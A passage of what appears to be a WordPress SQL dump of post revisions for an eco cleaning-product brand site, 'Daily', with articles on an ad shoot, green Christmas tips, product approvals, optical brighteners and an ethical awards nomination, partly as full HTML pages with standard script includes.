<li>Where possible we sourced and used props and clothing from responsible sources, including our friends <a href=\"../../friends/boden/\">Boden</a>, and the models also wore some of their own clothes.</li>\r\n 	<li>We shipped over as little product as possible to reduce weight and ensured these products appeared in as many scenes as we could. Obviously we left the products in South Africa so they can also Feel Good Cleaning there!</li>\r\n</ul>\r\n<strong>Did you meet any Daily lovers?</strong>\r\n\r\nWe were over the moon to discover that both the director Karen Lamond and voiceover artist Daisy Beaumont were already big Daily fans. Karen kindly gave up some of her time for free to work on the shoot and Daisy has always spread the word about our products to her friends and family so couldn\'t wait for the opportunity to do it on national TV!\r\n\r\n<strong>Were any children or animals harmed in the making of the ad?</strong>\r\n\r\nThe advert features plenty of children and an adorable cat named Tiggy. We stuck to the very tight rules and regulations surrounding the welfare of children and animals on set - not because we had to, but because we love children and animals, even having worked with them!\r\n\r\nThe children loved the shoot, and we think it shows. Of course, we made sure they only worked the regulated hours, their guardians were always at hand and when they were not needed on set a child-minder was on hand to keep them entertained.\r\n\r\nOur feline friend Tiggy shares her home with seven rowdy canines and she even brought one of them, Watson, along for the day. According to her owner \'she keeps them all under control\' so she seemed unfazed by the noise, chaos and action in the shoot… but we kept her handler and a vet nearby just in case.\r\n\r\n<strong>How did Daily stay true to its values?</strong>\r\n\r\nDaily have never been on TV like this before and we wanted to make sure we remained inclusive and represented our consumers equally and fairly. We hope that you can recognise a little bit of yourself in the ad.\r\n\r\nWe filmed the ad in real homes, with real people; we didn\'t want any TV trickery (airbrushing and fakery is not our style). After all, we pride ourselves on our honest and transparent approach.\r\n\r\n<strong>How are we including Daily users in 2012?</strong>\r\n\r\nThis year we will be hosting our very own Feel Good Events at some major festivals and events. As well as some great dancers showing off and teaching the moves from our TV ad, we\'ll have our very own electric vehicle touring around sites and handing out samples, so you can experience a Feel Good Clean once you get home.','What are Green Production Values?','','inherit','closed','closed','','42-revision-v1','','','2017-10-17 08:45:00','2017-10-17 08:45:00','',42,'http://www.dailyjolly.co.uk/42-revision-v1',0,'revision','',0),(80,1,'2017-10-17 08:45:29','2017-10-17 08:45:29','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/green-christmas-shopping\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section helpful-hints-and-tips-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/green-christmas-shopping/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Have yourself a merry green Christmas...</h2>\n														\n														<p>\n                                                            Last minute Christmas shopping, writing cards and wrapping presents, cleaning the house in preparation for your guests...there are so many tasks to complete in the run up to Christmas that trying to be \'green\' at the same time is easy to forget. \n														</p>\n														<p>\n                                                            That\'s why Daily has come up with top ten tips on how to inject a little \'green\' into your Christmas without breaking the bank or spoiling any of the festive fun!\n                                                            <ol>\n                                                                <li>Wear and Care this Christmas and add some eco to your festive wardrobe. Why not rock the office Christmas party eco-style this festive season? Visit <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.londonfashionweek.co.uk/estethica\" rel=\"nofollow\" target=\"_blank\">www.londonfashionweek.co.uk</a> for a list of eco fashion labels or check out our favourite Ada Zanditon\'s Autumn Winter collection. Also, Daily\'s laundry range means that you can wear high end fashion and care for it and the world around at the same time - perfect for the busy festive season</li>\n                                                                <li>Buying a real tree? Visit the <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.fsc-uk.org/\" rel=\"nofollow\" target=\"_blank\">Forest Stewardship Council</a> website to make sure your precious pine has been farmed sustainably.</li>\n                                                                <li>All of Daily\'s range is now made from Plant-astic - a sustainable plastic made from sugar cane. This means that if you choose Daily this Christmas to deal with your dirty plates, wash your best table linen, and keep your home clean, not only will your home be free from chemical nasties but also the packaging you\'re choosing is better for the world around you too! And it just got easier - <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/\" target=\"_blank\">Daily\'s online shop</a> means that you don\'t have to worry about heavy shopping bags either.</li>\n                                                                <li>Use last year\'s Christmas cards to make this year\'s gift tags - cut out the pictures and thread through some cotton - hey presto, recycling at its best. Don\'t forget to save this year\'s cards to use in 2018!</li>\n                                                                <li>Treat your guests to some eco luxury - pop some Daily Hand Wash in the bathroom and try Daily Room Fragrance to keep your house smelling fresh</li>\n                                                                <li>e-Christmas cards - why not try Facebook, Twitter or email rather than snail mail to send your seasons greetings?</li>\n                                                                <li>Banish those stains - gravy and cranberry sauce stains are rife on Christmas day. Remove them with ease Daily\'s Stain Remover - so effective it\'s been awarded a Which? Best Buy</li>\n                                                                <li>Travel together - try car sharing with friends and family or taking the bus to the shops to do your Christmas shopping</li>\n                                                                <li>Once you\'ve filled up on turkey, Yorkshire puddings and brussel sprouts, wash the dishes with Daily Washing Up Liquid - you can even use your left over dish water to feed the Christmas tree!</li>\n                                                                <li>Recycled wrapping paper is a really easy way to score \'green\' points at Christmas and doesn\'t cost the earth. Try the <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ethicalsuperstore.com/\" rel=\"nofollow\" target=\"_blank\">selection at the Ethical Superstore</a>.</li>\n                                                            </ol>\n														</p>\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </form>\n</body>\n</html>','Green Christmas Shopping','','inherit','closed','closed','','41-autosave-v1','','','2017-10-17 08:45:29','2017-10-17 08:45:29','',41,'http://www.dailyjolly.co.uk/41-autosave-v1',0,'revision','',0),(81,1,'2017-10-17 08:46:01','2017-10-17 08:46:01','<h2></h2>\r\n<h2 class=\"title\">Have yourself a merry green Christmas...</h2>\r\nLast minute Christmas shopping, writing cards and wrapping presents, cleaning the house in preparation for your guests...there are so many tasks to complete in the run up to Christmas that trying to be \'green\' at the same time is easy to forget.\r\n\r\nThat\'s why Daily has come up with top ten tips on how to inject a little \'green\' into your Christmas without breaking the bank or spoiling any of the festive fun!\r\n<ol>\r\n 	<li>Wear and Care this Christmas and add some eco to your festive wardrobe. Why not rock the office Christmas party eco-style this festive season? Visit <a href=\"http://www.londonfashionweek.co.uk/estethica\" target=\"_blank\" rel=\"nofollow noopener\">www.londonfashionweek.co.uk</a> for a list of eco fashion labels or check out our favourite Ada Zanditon\'s Autumn Winter collection. Also, Daily\'s laundry range means that you can wear high end fashion and care for it and the world around at the same time - perfect for the busy festive season</li>\r\n 	<li>Buying a real tree? Visit the <a href=\"http://www.fsc-uk.org/\" target=\"_blank\" rel=\"nofollow noopener\">Forest Stewardship Council</a> website to make sure your precious pine has been farmed sustainably.</li>\r\n 	<li>All of Daily\'s range is now made from Plant-astic - a sustainable plastic made from sugar cane. This means that if you choose Daily this Christmas to deal with your dirty plates, wash your best table linen, and keep your home clean, not only will your home be free from chemical nasties but also the packaging you\'re choosing is better for the world around you too! And it just got easier - <a href=\"http://www.ecoverdirect.com/\" target=\"_blank\" rel=\"noopener\">Daily\'s online shop</a> means that you don\'t have to worry about heavy shopping bags either.</li>\r\n 	<li>Use last year\'s Christmas cards to make this year\'s gift tags - cut out the pictures and thread through some cotton - hey presto, recycling at its best. Don\'t forget to save this year\'s cards to use in 2018!</li>\r\n 	<li>Treat your guests to some eco luxury - pop some Daily Hand Wash in the bathroom and try Daily Room Fragrance to keep your house smelling fresh</li>\r\n 	<li>e-Christmas cards - why not try Facebook, Twitter or email rather than snail mail to send your seasons greetings?</li>\r\n 	<li>Banish those stains - gravy and cranberry sauce stains are rife on Christmas day. Remove them with ease Daily\'s Stain Remover - so effective it\'s been awarded a Which? Best Buy</li>\r\n 	<li>Travel together - try car sharing with friends and family or taking the bus to the shops to do your Christmas shopping</li>\r\n 	<li>Once you\'ve filled up on turkey, Yorkshire puddings and brussel sprouts, wash the dishes with Daily Washing Up Liquid - you can even use your left over dish water to feed the Christmas tree!</li>\r\n 	<li>Recycled wrapping paper is a really easy way to score \'green\' points at Christmas and doesn\'t cost the earth. Try the <a href=\"http://www.ethicalsuperstore.com/\" target=\"_blank\" rel=\"nofollow noopener\">selection at the Ethical Superstore</a>.</li>\r\n</ol>','It\'s almost Christmas! Here\'s how you can stay green while shopping','','inherit','closed','closed','','41-revision-v1','','','2017-10-17 08:46:01','2017-10-17 08:46:01','',41,'http://www.dailyjolly.co.uk/41-revision-v1',0,'revision','',0),(82,1,'2017-10-17 08:47:08','2017-10-17 08:47:08','<h2 class=\"title\">Good Housekeeping Institute Approved</h2>\nWe\'re proud to say that we have been given the big thumbs up <strong>for good house keeping</strong>, testament that our products really do pack a punch especially when it comes to tackling the Spring Clean!\n\n&nbsp;\n\nThe Good Housekeeping<i> </i>is the backbone of their magazine \'Good Housekeeping Magazine\' which we all know and enjoy and over a century has established the reputation that consumers know and trust today.\n\nGHI exhaustively test consumer goods, so they can wholeheartedly provide invaluable and unbiased \'GH Approved\' status which is just what they\'ve done for our Daily Non-Bio Washing Powder, Non-Bio Concentrated Laundry Liquid, Multi-Surface Cleaner and All Purpose Cleaner.\n\nSo you can be <strong>100%</strong> sure that our products will get the job done, from wiping down surfaces with the versatile Daily Multi-Surface Cleaner to getting your tablecloth clean and fresh as a spring daisy with Daily Concentrated Laundry Liquid.\n\n<strong>We\'re not ones to blow our own trumpet, but with GHI\'s near on 100 years\' experience of scrubbing, scouring, washing and wiping, they should know!</strong>','Good Housekeeping Institute Approved','','inherit','closed','closed','','40-autosave-v1','','','2017-10-17 08:47:08','2017-10-17 08:47:08','',40,'http://www.dailyjolly.co.uk/40-autosave-v1',0,'revision','',0),(83,1,'2017-10-17 08:47:16','2017-10-17 08:47:16','<h2 class=\"title\">Good Housekeeping Institute Approved</h2>\r\nWe\'re proud to say that we have been given the big thumbs up <strong>for good house keeping</strong>, testament that our products really do pack a punch especially when it comes to tackling the Spring Clean!\r\n\r\n&nbsp;\r\n\r\nThe Good Housekeeping<i> </i>is the backbone of their magazine \'Good Housekeeping Magazine\' which we all know and enjoy and over a century has established the reputation that consumers know and trust today.\r\n\r\nGH exhaustively test consumer goods, so they can wholeheartedly provide invaluable and unbiased \'GH Approved\' status which is just what they\'ve done for our Daily Non-Bio Washing Powder, Non-Bio Concentrated Laundry Liquid, Multi-Surface Cleaner and All Purpose Cleaner.\r\n\r\nSo you can be <strong>100%</strong> sure that our products will get the job done, from wiping down surfaces with the versatile Daily Multi-Surface Cleaner to getting your tablecloth clean and fresh as a spring daisy with Daily Concentrated Laundry Liquid.\r\n\r\n<strong>We\'re not ones to blow our own trumpet, but with GHI\'s near on 100 years\' experience of scrubbing, scouring, washing and wiping, they should know!</strong>','Good Housekeeping Institute Approved','','inherit','closed','closed','','40-revision-v1','','','2017-10-17 08:47:16','2017-10-17 08:47:16','',40,'http://www.dailyjolly.co.uk/40-revision-v1',0,'revision','',0),(84,1,'2017-10-17 08:47:26','2017-10-17 08:47:26','<h2 class=\"title\">Good Housekeeping Institute Approved</h2>\r\nWe\'re proud to say that we have been given the big thumbs up <strong>for good house keeping</strong>, testament that our products really do pack a punch especially when it comes to tackling the Spring Clean!\r\n\r\n&nbsp;\r\n\r\nThe Good Housekeeping<i> </i>is the backbone of their magazine \'Good Housekeeping Magazine\' which we all know and enjoy and over a century has established the reputation that consumers know and trust today.\r\n\r\nGH exhaustively test consumer goods, so they can wholeheartedly provide invaluable and unbiased \'GH Approved\' status which is just what they\'ve done for our Daily Non-Bio Washing Powder, Non-Bio Concentrated Laundry Liquid, Multi-Surface Cleaner and All Purpose Cleaner.\r\n\r\nSo you can be <strong>100%</strong> sure that our products will get the job done, from wiping down surfaces with the versatile Daily Multi-Surface Cleaner to getting your tablecloth clean and fresh as a spring daisy with Daily Concentrated Laundry Liquid.\r\n\r\n<strong>We\'re not ones to blow our own trumpet, but with GHI\'s near on 100 years\' experience of scrubbing, scouring, washing and wiping, they should know!</strong>','Good Housekeeping','','inherit','closed','closed','','40-revision-v1','','','2017-10-17 08:47:26','2017-10-17 08:47:26','',40,'http://www.dailyjolly.co.uk/40-revision-v1',0,'revision','',0),(85,1,'2017-10-17 08:47:44','2017-10-17 08:47:44','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <meta property=\"og:url\" content=\"http://www.the-splash.co.uk/articles/no-nasties\"/>\n    <meta property=\"og:title\" content=\"Ecover products contain no Nasties\"/>\n    <meta property=\"og:description\" content=\"Top 5 facts about Ecover products:   1. No phosphates   2. No optical brighteners   3. No foam boosters   4. Plant-based ingredients   5. Cruelty-free products\"/>\n    <meta property=\"og:image\" content=\"http://www.the-splash.co.uk/images/articles/no-nasties-fb.jpg\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/no-nasties\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section cleaning-with-care-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/no-nasties/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n                            <div class=\"twocols\">\n                              <div class=\"content\">\n                                <h1 class=\"title\">&nbsp;</h1>\n                                <p>\n                                  You\'ve heard the phrase \'tidy home, tidy mind\'. So if your aim is to not be so stressed, or you want to keep the home in better shape, why not also kick the \'nasties\' with Daily. Now that truly is Feel Good.\n                                  </p>\n														<div class=\"highlight blue\">\n														    <p>Top 5 Facts:</p>\n														    <ol>\n														        <li>No <a href=\"../../articles/about-ecover/\">phosphates</a></li>\n														        <li>No <a href=\"../../articles/optical-brighteners/\">optical brighteners</a></li>\n														        <li>No <a href=\"../../articles/foam-boosters/\">foam boosters</a></li>\n														        <li><a href=\"../../articles/fantastic-plantastic/\">Plant-based ingredients</a></li>\n														        <li><a href=\"../../articles/cruelty-free-products/\">Cruelty-free products</a></li>\n														    </ol>\n														    Kind to you, your family and nature\n														</div>\n                                                        \n														<p>\n                                                            You may not know but many conventional brands of laundry, cleaning and homecare products contain certain chemical ingredients that can be considered a \'nasty\'.\n                                                        </p>\n														<p>\n                                                            Daily products contain natural, sustainable <a href=\"../../articles/our-ingredients/\">plant-based ingredients</a> which are kinder to your family and the environment.\n                                                        </p>\n														<p>\n                                                            Futile ingredients such as <a href=\"../../articles/optical-brighteners/\">optical brighteners</a>, a \'nasty\', are used in some laundry products to make your clothes appear brighter so it\'s assumed they\'re cleaner! And that\'s just one example. There are many \'nasties\' on your supermarket shelf.\n                                                        </p>\n                                                        \n														<p>\n                                                            As cleaning and laundry products are an essential aspect of everyone\'s day, it is important that they are kind to your skin. Another reason Daily is committed to having \'no nasties\' in our products is to save your skin from potential irritants which could cause discomfort. We are so dedicated in looking out for you that we have been accredited with the <a href=\"../../articles/sensitive-skin/\">\'Sensitive Skin\'</a> logo.\n                                                        </p>\n														<p>\n                                                            Don\'t be misled by thinking that because we are skin kind and less harmful to the environment that we don\'t work. We are GHI approved which means you don\'t have to compromise with those nasties!\n                                                        </p>\n														<p>\n                                                            We can help you achieve the \'tidy home, tidy mind\' as well as keeping the tidy planet too. Now that\'s one New Year\'s resolution worth keeping.\n                                                        </p>\n														<p>\n                                                            So what are you waiting for? We\'re 3 for 2 at <a href=\"http://www.ecoverdirect.com/promotions/green-cleaning-start-to-2013.aspx?promotion=315\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">DailyDirect</a> to help you on your way.<br/>\n														</p>\n														\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Eco-friendly products contain no Nasties','','inherit','closed','closed','','46-revision-v1','','','2017-10-17 08:47:44','2017-10-17 08:47:44','',46,'http://www.dailyjolly.co.uk/46-revision-v1',0,'revision','',0),(86,1,'2017-10-17 08:47:57','2017-10-17 08:47:57','<h2 class=\"title\">Why we don\'t use brighteners</h2>\r\nMost of the washing powders and liquids you\'ll find on supermarket shelves use optical brighteners to whiten your washing. As chemical agents, optical brighteners work by absorbing ultraviolet light and turning it into visible blue light, which masks any yellowing of your clothes that can occur over time. Your clothes appear whiter and brighter (but they\'re not actually any cleaner).\r\n\r\nBy design, optical brighteners can only keep on working if they stick to the fabrics they\'ve washed. The problem is, they\'re not very discerning about what or who they stick to. If it\'s in their nature to bond to fabrics, it\'s also in their nature to bond to your skin, and they do so irreversibly. Often, it\'s not fragrances and dyes that cause skin rashes and sensitivity, but optical brighteners.\r\n\r\nAnd there\'s worse news when it comes to the environment. Many of the chemicals classed as optical brighteners can be toxic to aquatic life, and they\'ve been proven to cause mutations in bacteria. They\'re slow to biodegrade, so once they\'ve been washed away into our rivers and streams, they hang around, polluting waterways for a long time to come.\r\n\r\nWe\'ve never been lovers of optical brighteners. While they\'ve not yet been proven dangerous to humans, <strong><u>they\'ve never been proven safe</u></strong>, either. One thing we do know is that they\'re harmful to the environment, and this alone is enough of a reason to omit them from the products in our laundry range - or any of our products, full stop.\r\n\r\nWe\'re confident our products clean so effectively that we don\'t need to enhance the results with a trick of the light. We think your skin is dazzling enough without an extra coating of chemicals. And we believe the earth\'s water life is more important than a whiter-than-white wash.','Optical Brighteners','','inherit','closed','closed','','48-revision-v1','','','2017-10-17 08:47:57','2017-10-17 08:47:57','',48,'http://www.dailyjolly.co.uk/48-revision-v1',0,'revision','',0),(87,1,'2017-10-17 08:48:04','2017-10-17 08:48:04','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/nominate-your-winner\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section organisations-we-support-subsection\">\n<form name=\"aspnetForm\" method=\"post\" action=\"../../articles/nominate-your-winner/\" id=\"aspnetForm\">\n<div class=\"body\">\n    <div class=\"wrapper\">\n        <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n													  <h3>Calling all ethical pioneers</h3>\n														<p>\n                                                            We\'ve been big supporters of the <a href=\"../../friends/observer-ethical-awards/\">Observer Ethical Awards</a> for a while now. Designed to recognise and reward the green pioneers and ethical innovators of the world, each year brings a raft of even more brilliant ideas and inventions from nominees. \n                                                        </p>\n														<p>\n                                                            Daily are particularly proud to sponsor the Kids category; we believe it\'s important to encourage an understanding of ethical issues in the next generation of bright young things. After all, if they\'re coming up with such groundbreaking ideas now, we can only imagine what they\'ll be capable of in future.\n                                                        </p>\n                                                        \n														<p>\n                                                            Previous winners of the Kids category have given us the <a href=\"../../articles/bat-or-bird-box/\">BOB (Bat Or Bird) Box</a>, secret wildlife gardens and plastic recycling projects - all from the creative minds of the under 16s. And the time has come to nominate for the next round of awards. \n                                                        </p>\n                                                        <br style=\"clear:both\"/>\n                                                        <h3>Nominate a great, green idea</h3>\n                                                        <p>\n                                                            If you\'ve had an ethical business idea, come up with an innovative invention or embarked on a project that\'s had a positive impact on your local community, or if you know a young person who has, this is your chance to shout about it. Nominate yourself<hyperlink to nominate observer page> (or someone else) in the Observer Ethical Awards 2018 Kids category and, if you\'re a winner, you could get &pound;2,000 a year over three years to develop your project, courtesy of Daily. \n                                                        </p>\n														<p>\n                                                            Find out more about the <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.guardian.co.uk/environment/2018/jan/15/observer-ethical-awards-2018\" rel=\"nofollow\" target=\"_blank\">Observer Ethical Awards 2018</a>.\n                                                        </p>\n                                                        <p>\n                                                            This year\'s winners have just been announced:\n                                                        </p>\n                                                        <div class=\"share-this\">\n															<div class=\"tweet-form\"></div>\n                                                        </div>\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n        </div>\n    </div>\n</div>\n</form>\n</body>\n</html>','Observer Ethical Values - Nominate your winner','','inherit','closed','closed','','47-autosave-v1','','','2017-10-17 08:48:04','2017-10-17 08:48:04','',47,'http://www.dailyjolly.co.uk/47-autosave-v1',0,'revision','',0),(88,1,'2017-10-17 08:48:13','2017-10-17 08:48:13','<h3>Calling all ethical pioneers</h3>\r\nWe\'ve been big supporters 